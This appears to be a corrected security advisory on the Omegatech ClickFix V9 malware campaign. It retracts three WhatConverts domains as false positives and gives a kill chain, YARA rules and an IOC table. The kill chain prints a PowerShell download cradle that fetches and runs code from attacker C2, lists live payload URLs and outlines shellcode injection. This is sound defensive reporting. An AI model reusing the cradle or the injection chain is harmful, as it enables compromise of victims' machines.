⚠️
Corrected Advisory — Partial Retraction in Effect
Corrected version of SL-ADV-2026-WP-001-V9 (originally published 2026-06-10). Three indicators attributed to WhatConverts have been retracted following PCAP re-analysis and vendor response. Core Omegatech IOCs remain valid. See Retraction for full details.
SL-RETRACT-2026-001 · 2026-06-13

Sections
⚠ Retraction
V8 vs V9 delta
Forensic findings
YARA rules
IOC reference

Threat actorOmegatech LTD
ASNAS202412 (SC)
Lure sitewilliamhale.co.uk
PCAP refea5e5bd2
RetractionSL-RETRACT-2026-001
Security Advisory · 2026-06-10 · Corrected 2026-06-13

Omegatech EtherHiding
ClickFix V9

Infrastructure rotation of V8 introducing separated beacon/payload stages, renamed payload paths (student_*.bin), and a C# P/Invoke stub with tid→sid YARA evasion. Lure site: compromised UK CCTV business williamhale.co.uk. Note: three indicators originally attributed to this campaign have been retracted — they belong to WhatConverts, a legitimate SaaS platform that was coincidentally installed on the victim site.

26s
Time to active C2
12yr
iconnode.com domain age
1,254
Chars injected into legit JS
2
AS202412 C2 IPs (new)
3
Domains retracted (WhatConverts)
Retraction
📋
SL-RETRACT-2026-001
WhatConverts — False Positive Retraction

The original V9 advisory (2026-06-10) attributed three domains to the Omegatech ClickFix campaign. Following vendor response and fresh PCAP re-analysis, SecureLeaf has determined these indicators were incorrectly attributed and has retracted them. They belong to WhatConverts (whatconverts.com), a legitimate SaaS lead-tracking platform serving over 20,000 businesses.

The mistake was understandable in context: both the WhatConverts tracking script and the Omegatech ClickFix injector were present on the same compromised WordPress page (williamhale.co.uk), and WhatConverts' domain naming conventions — s.ksrndkehqnwntyxlhgto.com, p.ksrndkehqnwntyxlhgto.com, process.iconnode.com — are deliberately designed to resemble random strings in order to evade ad blockers, which produces a fingerprint indistinguishable from threat actor CDN infrastructure to an outside observer. A reasonable analyst mistake. That said, the error is ours, and we are correcting it fully.

The definitive evidence is chronological:

Fresh PCAP detonation — task e79e88ad · williamhale.co.uk
t = 5.27ss.ksrndkehqnwntyxlhgto.com↳ WhatConverts tracker — fires on page load ✓
t = 5.75sbsc-testnet-rpc.publicnode.com↳ EtherHiding BSC query — Omegatech ✗
t = 5.89sprocess.iconnode.com↳ WhatConverts ad-blocker detection — fires on page load ✓
↕ 4.86 seconds pass
t = 10.13sdntds.shop↳ ClickFix JS delivery — Omegatech ✗ (CONFIRMED MALICIOUS)
t = 11.31sp.ksrndkehqnwntyxlhgto.com↳ WhatConverts install verification — fires after full load ✓

WhatConverts fires on page load, nearly 5 seconds before the Omegatech ClickFix payload arrives from dntds.shop. Static analysis of the VM50 ClickFix loader (SHA256: f253e505...356e45) confirmed zero references to any WhatConverts domain — not even encoded or hex-escaped. The two systems are entirely independent occupants of the same compromised page.

WhatConverts' technical explanations of the flagged behaviors are accurate: process.iconnode.com/google-ads/ is an ad-blocker detection endpoint (the path is intentionally named to be blocked, which toggles a detection flag); p.ksrndkehqnwntyxlhgto.com/verification/ is a customer-initiated script install check. Both behaviors are documented publicly in their WordPress plugin listing and help documentation. AWS Trust & Safety confirmed no malicious activity on their infrastructure after engaging with WhatConverts directly.

WhatConverts — Cleared
WhatConverts and its infrastructure are not associated with the Omegatech ClickFix campaign or any malicious activity. If you observed WhatConverts domains in telemetry alongside this campaign, the explanation is coincidence: the victim site had WhatConverts legitimately installed. Contact their security team at security@whatconverts.com if you observed specific malicious behavior on a site running their script.
Retracted Indicators
RETRACTED s.ksrndkehqnwntyxlhgto.com — WhatConverts CDN (legitimate)
RETRACTED p.ksrndkehqnwntyxlhgto.com — WhatConverts verification endpoint (legitimate)
RETRACTED process.iconnode.com — WhatConverts ad-blocker detection (legitimate)
These indicators have been withdrawn from OTX pulse 6a29d0814b8d5e47a8e509a8. STIX bundle updated: SL-ADV-2026-WP-001-V9-CORRECTED.stix2.json
Kill Chain
STAGE 0T+0.00s
Lure page — williamhale.co.uk
Compromised WordPress · UK CCTV & security business
Brotli-compressed HTML (31 KB → 134 KB decompressed). Injected <script> tag loads VM50 ClickFix loader from attacker-controlled path.
WhatConverts tracking script (s.ksrndkehqnwntyxlhgto.com/137116.js) also loads — legitimately installed by site owner, unrelated to Omegatech. The injected 1,254-char prefix on that script file is a separate Omegatech injection into the WhatConverts customer's script instance.
Hosted at 141.193.213.10/11 (Cloudflare Spectrum, co.uk TLD).
HOSTwilliamhale.co.uk · 141.193.213.10
STAGE 1T+5.75s
EtherHiding — BNB Smart Chain payload pointer
Blockchain-based URL obfuscation · bypasses static URL blocklists
ClickFix JS queries bsc-testnet-rpc.publicnode.com to retrieve the next-stage payload URL from a BNB Smart Chain smart contract. URL is never hardcoded in the lure JS.
Resolves to Cloudflare IPs (172.66.150.162, 104.20.24.117). publicnode.com is a legitimate BSC RPC service being abused — not itself malicious.
PCAP: BSC query at t=5.75s, 4.38s before dntds.shop contact. Pattern repeats at t=53.95s (second detonation cycle).
DNSbsc-testnet-rpc.publicnode.com
STAGE 2T+10.13s
ClickFix JS delivery — dntds.shop/teamrepo
Fake Cloudflare CAPTCHA · clipboard hijack
Obfuscated JS (~1.19 MB) served from dntds.shop/teamrepo?rnd=<float>&ts=<unix_ms>. V9 path change: /teamrepo (V8 used /jsrepo). Resolves to 178.16.53.137:443.
JS renders fake Cloudflare verification overlay using Shadow DOM injection. Presents a "Press Windows+R, paste, Enter" ClickFix lure.
Clipboard is overwritten with PowerShell download cradle (irm+iex pattern) pointing to 91.92.240.121 (V9 C2, replacing 158.94.208.92 from V8).
DOMAINdntds.shop · 178.16.53.137
STAGE 3T+~15s (user action)
PowerShell download cradle — irm+iex
User-assisted execution · Run dialog clipboard paste
Victim pastes clipboard into Win+R Run dialog. PowerShell executes: iex(irm '91.92.240.121/...'). Stage-2 PS loader retrieved from C2.
Loader performs geo-check (language/locale), machine GUID profiling, and privilege check before proceeding.
Uses Add-Type to compile C# P/Invoke stub (zgxr4teh_0.cs) via csc.exe into zgxr4teh.dll in %TEMP%.
IP91.92.240.121 · AS202412 · PS C2
STAGE 4T+~20s
Payload fetch — student_s.bin + student_l.bin
Shellcode + staging blob · 158.94.208.104
GET http://158.94.208.104/x7GkP2mQ9zL4/student_s.bin — PE shellcode (~305 KB). V9 rename from my_s.bin (V8), evading /my_*\.bin YARA signatures.
GET http://158.94.208.104/x7GkP2mQ9zL4/student_l.bin — staging blob (~52 KB, served as image/png). V9 rename from my_newest_ll.png.
Path prefix /x7GkP2mQ9zL4/ identical to V8 — same Tier-1 staging operator confirmed.
URLhttp://158.94.208.104/x7GkP2mQ9zL4/student_s.bin
STAGE 5T+~23s
Shellcode injection — VirtualAlloc → CreateThread → svchost
In-process execution · CDPUserSvc process hollowing
Compiled DLL (zgxr4teh.dll) called from PS runspace: VirtualAlloc → shellcode copy → CreateThreadWaitForSingleObject.
Shellcode injects into svchost.exe CDPUserSvc instance. Donut loader attribution confirmed across V8+V9 via 8/8 static indicators.
V9 YARA evasion: P/Invoke param rename tidsid. Tier-1 dev fingerprint (abbreviated param names) preserved across both variants.
HASHzgxr4teh_0.cs · F833D774...CE451C
STAGE 6T+~26s
RAT C2 — 91.92.243.161:3038
Persistent C2 · MSIL/Generic RAT · AS202412
Injected svchost.exe establishes persistent connection to 91.92.243.161:3038. Non-standard port, MSIL/Generic activity confirmed by sandbox.
Both V9 C2 IPs (91.92.240.121, 91.92.243.161) on AS202412, Spamhaus DROP groups 14+31. Full compromise in approximately 26 seconds from first browser contact.
IP:PORT91.92.243.161:3038 · AS202412 · RAT C2
V8 vs V9 Delta
ComponentV8V9
Lure sitepenrosept.com (PT clinic, USA)williamhale.co.uk (CCTV, UK)NEW
TDS path/jsrepo?rnd=/teamrepo?rnd=NEW
TDS hostdntds.shop → 178.16.53.137dntds.shop → 178.16.53.137 (unchanged)
PS C2 IP158.94.208.9291.92.240.121ROTATED
RAT C2 IP158.94.208.10491.92.243.161:3038ROTATED
Staging server158.94.208.104158.94.208.104 (unchanged)
Staging path/x7GkP2mQ9zL4//x7GkP2mQ9zL4/ (unchanged)
Payload namesmy_s.bin / my_newest_ll.pngstudent_s.bin / student_l.binYARA EVASION
C# stub paramtid (WaitForSingleObject)sidYARA EVASION
Loader filenameflferzre_0.cs / flferzre.dllzgxr4teh_0.cs / zgxr4teh.dll
Donut loaderConfirmed (8/8 indicators)Confirmed (inherited)
Tier-1 devAbbreviated P/Invoke paramsAbbreviated P/Invoke params (same operator)
EtherHidingbsc-testnet-rpc.publicnode.combsc-testnet-rpc.publicnode.com (unchanged)
Forensic Findings
YARA EVASION
tid → sid
The V9 C# P/Invoke stub renamed the WaitForSingleObject thread handle parameter from tid to sid. This was a direct response to the V8 YARA rule published in SL-ADV-2026-WP-001-V8. The underlying technique is identical; the abbreviated parameter naming style (Tier-1 dev fingerprint) was preserved, confirming the same developer.
PAYLOAD RENAME
student_*.bin
Payload files renamed from my_s.bin / my_newest_ll.png (V8) to student_s.bin / student_l.bin (V9). The /my_*\.bin URL pattern YARA signature from V8 would have caught V8 payloads; the rename evades it. The staging server IP and path prefix /x7GkP2mQ9zL4/ are unchanged, providing continued detection coverage.
AGED DOMAIN
iconnode.com
process.iconnode.com (registered 2014, DNS changed May 2026) appeared in V9 telemetry. It is owned by WhatConverts — see Retraction section. The aged domain strategy (12yr dormant domain weaponised for high reputation score) remains a valid Omegatech TTP in other contexts, but this specific instance does not apply here.
VM50 LOADER
RC4 obfuscation
The VM50 ClickFix lure JS (1.25 MB) uses obfuscator.io-style RC4+base64 string encryption with a rotating 17,681-entry string array and 72 helper functions mapping 5-parameter call sites to index/key pairs. Static deobfuscation confirmed zero WhatConverts domain references, establishing independent operation from the WC tracking script.
C2 ROTATION
AS202412
V9 rotated C2 from the 158.94.208.x /24 (V8) to 91.92.240.x and 91.92.243.x — still AS202412, still Spamhaus DROP-listed. The rotation is cosmetic; infrastructure ownership is unchanged. The 158.94.208.104 staging server was kept, suggesting Tier-1 payload operator didn't receive the rotation memo or chose continuity for reliability.
YARA Detection Rules
SecureLeaf_Omegatech_V9_CSharp_Loader
Detects the V9 P/Invoke stub. Updated for sid rename; also catches V8 tid variant via OR condition.
rule SecureLeaf_Omegatech_V9_CSharp_Loader {
  meta:
    description = "Omegatech V9 C# P/Invoke shellcode loader stub (zgxr4teh / flferzre variants)"
    author      = "SecureLeaf / Dispensight"
    date        = "2026-06-10"
    campaign    = "Omegatech-EtherHiding-V9"
    tlp         = "WHITE"
  strings:
    $va    = "VirtualAlloc"  ascii
    $ct    = "CreateThread"  ascii
    $wfso  = "WaitForSingleObject" ascii
    $gcp   = "GetCurrentProcess" ascii
    $sid   = "uint sid"  ascii  // V9 renamed param
    $tid   = "uint tid"  ascii  // V8 param (catches older variant)
    $dllim = "DllImport"  ascii
    $kern  = "kernel32"  ascii
  condition:
    $va and $ct and $wfso and $gcp and $dllim and $kern and ($sid or $tid)
}
SecureLeaf_Omegatech_V9_Payload_URL
Detects V9 payload staging URL pattern. Covers both student_* (V9) and my_* (V8) naming under the same path prefix.
rule SecureLeaf_Omegatech_V9_Payload_URL {
  meta:
    description = "Omegatech staging server payload URL — path prefix survives V8/V9 rotation"
    author      = "SecureLeaf / Dispensight"
    date        = "2026-06-10"
  strings:
    $path     = "/x7GkP2mQ9zL4/"         ascii
    $student  = "student_"               ascii  // V9
    $my_      = "my_"                    ascii  // V8
    $bin      = ".bin"                   ascii
  condition:
    $path and $bin and ($student or $my_)
}
SecureLeaf_Omegatech_ClickFix_TDS
Detects the /teamrepo (V9) and /jsrepo (V8) EtherHiding TDS URL pattern. Cache-busting float parameter is the stable anchor.
rule SecureLeaf_Omegatech_ClickFix_TDS {
  meta:
    description = "Omegatech EtherHiding ClickFix TDS URL pattern (/teamrepo or /jsrepo)"
    author      = "SecureLeaf / Dispensight"
    date        = "2026-06-10"
  strings:
    $teamrepo = "/teamrepo?rnd="  ascii  // V9
    $jsrepo   = "/jsrepo?rnd="    ascii  // V8
    $dntds    = "dntds.shop"      ascii
  condition:
    $dntds and ($teamrepo or $jsrepo)
}
IOC Reference
TypeValueRole / Notes
DOMAIN dntds.shop ClickFix TDS. V9 path: /teamrepo?rnd=. Resolves to 178.16.53.137.
IP 178.16.53.137 dntds.shop hosting IP. ClickFix JS delivery, port 443.
IP 91.92.240.121 V9 PS C2 check-in. AS202412, Spamhaus DROP 14+31. Replaces 158.94.208.92 (V8).
IP 91.92.243.161 V9 RAT C2, port 3038. AS202412. svchost CDPUserSvc post-injection beacon.
IP 158.94.208.104 Omegatech payload staging. /x7GkP2mQ9zL4/student_s.bin + student_l.bin.
URL http://158.94.208.104/x7GkP2mQ9zL4/student_s.bin V9 shellcode PE payload (~305 KB). V8 equivalent: my_s.bin.
URL http://158.94.208.104/x7GkP2mQ9zL4/student_l.bin V9 staging blob (~52 KB, served as image/png). V8 equivalent: my_newest_ll.png.
DOMAIN bsc-testnet-rpc.publicnode.com EtherHiding BSC RPC resolver. publicnode.com is legitimate; abused by Omegatech.
SHA256 F833D7746ACC05A08F83A6BC17DF99CDBAB70ABD564B92870E4477B5D2CE451C zgxr4teh_0.cs — V9 C# P/Invoke loader source. tid→sid YARA evasion.
SHA256 86C9D146201932FEB8D6B42161938F1C145C8989E7C753AAC876704D365724E9 137116.js — WhatConverts script with injected 1,254-char malicious prefix. WC platform itself is NOT malicious; only this injected version.
SHA256 F253E50585499F3120E5E8842B58E1B0BD0883CF0DB7E1CA6FF2D718CA356E45 VM50 — ClickFix lure JS (1.25 MB, RC4+base64 obfuscation). Zero WhatConverts domain references confirmed.
RETRACTED s.ksrndkehqnwntyxlhgto.comRETRACTED WhatConverts CDN. Legitimate SaaS platform. Fires t=5.27s on page load — 4.86s before dntds.shop. See Retraction section.
RETRACTED p.ksrndkehqnwntyxlhgto.comRETRACTED WhatConverts verification endpoint. Legitimate. See Retraction section.
RETRACTED process.iconnode.comRETRACTED WhatConverts ad-blocker detection endpoint. Legitimate. See Retraction section.